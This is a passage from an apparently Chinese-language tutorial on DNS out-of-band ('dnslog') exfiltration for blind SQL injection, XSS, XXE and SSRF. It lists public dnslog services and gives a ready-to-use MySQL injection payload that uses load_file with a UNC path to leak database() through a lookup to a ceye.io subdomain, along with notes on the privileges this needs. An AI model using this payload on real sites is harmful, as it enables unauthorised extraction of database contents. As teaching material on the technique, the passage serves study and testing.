目录
前言
我们常见的sql注入、xss、xxe、ssrf等web漏洞都会存在无回显的情况,为了更方便的获取到查询的内容,因此有了DNS带外注入。
一、DNS带外注入是什么?
DNS即域名解析协议,用于ip和域名之间的相互解析,而dnslog就是记录了你对此域名或者ip的访问信息(即日志记录),在上述漏洞的盲注中,我们将查询结果拼接到dns服务器域名上面进行请求,那么dns服务器就会收到拼接后的字符串,也就看到了回显的结果,完成盲注。
二、dnslog的常见平台
http://www.dnslog.cn
http://admin.dnslog.link
http://ceye.io
三、实战
1. 联合sql盲注
如某个注入点为?id=1,则在之后拼接上and if((select load_file(concat('\\\\',(select database()),'.xxxx.ceye.io\\aaa'))),1,1)--+,然后就可以在ceye服务器上接收到需要查询的数据,需要注意的是这里的数据库权限必须有load_file权限,最好是root,可以用show global variables like '%secure%',secure_file_priv必须为空才能读取文件,为null则不能读取文件